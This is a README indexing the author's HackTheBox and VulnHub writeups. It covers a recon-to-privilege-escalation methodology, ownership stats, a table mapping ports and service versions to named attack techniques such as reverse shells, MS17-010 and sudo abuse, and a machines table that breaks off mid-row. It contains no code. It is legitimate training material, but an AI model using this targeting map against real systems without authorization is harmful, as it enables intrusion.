text
stringlengths
9
334k
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menumerate) * ⚙️ [Phase 2: Exploit](#mexploit) * ⚙️ [Phase 3: PrivEsc](#mprivesc) - ☀️ [Stats](#stats) * 📊 [Counts](#counts) * 📊 [Top Categories](#topcategories) * 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices) * 📊 [Top TTPs](#topttps) - ⚡ [Mapping](#mapping) - 💥 [Machines](#machines) - ☢️ [TTPs](#ttps) * ⚙️ [Enumerate](#enumerate) * ⚙️ [Exploit](#exploit) * ⚙️ [PrivEsc](#privesc) - ⚡ [Tips](#tips) - 💥 [Tools](#tools) - 🔥 [Loot](#loot) * 🔑 [Credentials](#credentials) * 🔑 [Hashes](#hashes) <a name="methodology"></a> ## ☀️ Methodology [↟](#contents) <a name="mrecon"></a> ### ⚙️ Phase #0: Recon [🡑](#methodology) **Goal**: to scan all ports on &lt;targetip&gt; **Process**: * [enumerate_nmap_initial](#enumerate_nmap_initial) * [enumerate_nmap_tcp](#enumerate_nmap_tcp) * [enumerate_nmap_udp](#enumerate_nmap_udp) <a name="menumerate"></a> ### ⚙️ Phase #1: Enumerate [🡑](#methodology) **Goal**: to find service and version details **Process**: * find ttps for open ports * start with weird services * identify installed software and version * find critical cve/exploits * enumerate more common services - smb/ftp * enumerate services with large attack vector like http at the end <a name="mexploit"></a> ### ⚙️ Phase #2: Exploit [🡑](#methodology) **Goal**: gain interactive access on &lt;targetip&gt; **Process**: * debug available exploits for open ports <a name="mprivesc"></a> ### ⚙️ Phase #3: PrivEsc [🡑](#methodology) **Goal**: gain elevated privileges on &lt;targetip&gt; **Process**: * debug available exploits or misconfigurations * for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration) * for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) <a name="stats"></a> ## ☀️ Stats [↟](#contents) ### 📊 Counts [🡑](#stats) | # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned | |:--------:|:---------------:|:----------------:|:-----------------:|:-----------------:|:-----------------:| | Total | `1/492 (0.20%)` | `25/263 (9.51%)` | `24/725 (3.31%)` | `46/254 (18.11%)` | `50/1480 (3.38%)` | | Windows | `0/0 (0.00%)` | `12/74 (16.22%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/76 (15.79%)` | | *nix | `0/0 (0.00%)` | `13/189 (6.88%)` | `24/723 (3.32%)` | `34/177 (19.21%)` | `37/912 (4.06%)` | | OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` | <a name="topcategories"></a> ### 📊 Top Categories [🡑](#stats) <img src="./top_categories.png" height="320" /> <a name="topportsprotocolsservices"></a> ### 📊 Top Ports/Protocols/Services [🡑](#stats) <img src="./top_ports.png" height="320" /> --- <img src="./top_protocols.png" height="320" /> --- <img src="./top_services.png" height="320" /> <a name="topttps"></a> ### 📊 Top TTPs [🡑](#stats) <img src="./top_ttps_enumerate.png" height="320" /> --- <img src="./top_ttps_exploit.png" height="320" /> --- <img src="./top_ttps_privesc.png" height="320" /> <a name="mapping"></a> ## ⚡ Mapping [↟](#contents) | # | Port | Service | TTPs | TTPs - ITW | |---|------|-----------|------|------------| | 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) | | 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | | | 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | | | 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | | | 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | | | 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 6.0`<br /><br />`http/Microsoft IIS httpd 7.5` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 8. | `111/tcp` | | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs), [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 9. | `135/tcp` | | [`enumerate_proto_rpc`](https://github.com/7h3rAm/writeups#enumerate_proto_rpc) | | | 10. | `139/tcp` | `netbios-ssn/Microsoft Windows netbios-ssn`<br /><br />`netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root) | | 11. | `161/tcp` | | [`enumerate_proto_snmp`](https://github.com/7h3rAm/writeups#enumerate_proto_snmp) | | | 12. | `389/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 13. | `443/tcp` | `ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 14. | `445/tcp` | `microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds` | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067), [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 15. | `636/tcp` | | [`enumerate_proto_ldap`](https://github.com/7h3rAm/writeups#enumerate_proto_ldap) | | | 16. | `1337/tcp` | `http/Apache httpd 2.4.7 ((Ubuntu))` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 17. | `1433/tcp` | `ms-sql-s/Microsoft SQL Server 14.00.1000.00` | [`enumerate_proto_mssql`](https://github.com/7h3rAm/writeups#enumerate_proto_mssql), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig) | [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell) | | 18. | `1521/tcp` | | [`enumerate_proto_oracle`](https://github.com/7h3rAm/writeups#enumerate_proto_oracle), [`enumerate_proto_postgres`](https://github.com/7h3rAm/writeups#enumerate_proto_postgres) | | | 19. | `1974/tcp` | | | [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 20. | `2049/tcp` | `nfs_acl/2-3 (RPC #100227)`<br /><br />`nfs_acl/3 (RPC #100227)` | [`enumerate_proto_nfs`](https://github.com/7h3rAm/writeups#enumerate_proto_nfs) | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid) | | 21. | `3000/tcp` | `http/Node.js Express framework` | | [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 22. | `3232/tcp` | | [`enumerate_proto_distcc`](https://github.com/7h3rAm/writeups#enumerate_proto_distcc) | | | 23. | `3306/tcp` | | [`enumerate_proto_mysql`](https://github.com/7h3rAm/writeups#enumerate_proto_mysql) | | | 24. | `6660/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 25. | `6661/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 26. | `6662/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 27. | `6663/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 28. | `6664/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 29. | `6665/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 30. | `6666/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 31. | `6667/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 32. | `6668/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 33. | `6669/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 34. | `7000/tcp` | | [`enumerate_app_unrealirc`](https://github.com/7h3rAm/writeups#enumerate_app_unrealirc) | | | 35. | `8080/tcp` | `http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)` | [`enumerate_app_apache`](https://github.com/7h3rAm/writeups#enumerate_app_apache), [`enumerate_app_apache_tomcat`](https://github.com/7h3rAm/writeups#enumerate_app_apache_tomcat), [`enumerate_app_coldfusion_files`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_files), [`enumerate_app_coldfusion_version`](https://github.com/7h3rAm/writeups#enumerate_app_coldfusion_version), [`enumerate_app_drupal`](https://github.com/7h3rAm/writeups#enumerate_app_drupal), [`enumerate_app_joomla`](https://github.com/7h3rAm/writeups#enumerate_app_joomla), [`enumerate_app_phpmyadmin`](https://github.com/7h3rAm/writeups#enumerate_app_phpmyadmin), [`enumerate_app_prtg`](https://github.com/7h3rAm/writeups#enumerate_app_prtg), [`enumerate_app_webmin`](https://github.com/7h3rAm/writeups#enumerate_app_webmin), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_proto_rdp`](https://github.com/7h3rAm/writeups#enumerate_proto_rdp), [`enumerate_proto_webdav`](https://github.com/7h3rAm/writeups#enumerate_proto_webdav) | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 36. | `9999/tcp` | `abyss?` | | [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 37. | `10000/tcp` | `http/SimpleHTTPServer 0.6 (Python 2.7.3)` | | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof) | | 38. | `27017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | | 39. | `28017/tcp` | | [`enumerate_app_mongo`](https://github.com/7h3rAm/writeups#enumerate_app_mongo) | | <a name="machines"></a> ## 💥 Machines [↟](#contents) | # | Name | Infra | Killchain | TTPs | |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100"/> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | | 2. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png" width="59" height="20"/> | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 3. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100"/> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png" width="59" height="20"/> | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 5. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png" width="59" height="20"/> | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100"/> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100"/> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 7. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 8. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png" width="59" height="20"/> | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) | | 9. | [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png" width="59" height="20"/> | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100"/> | 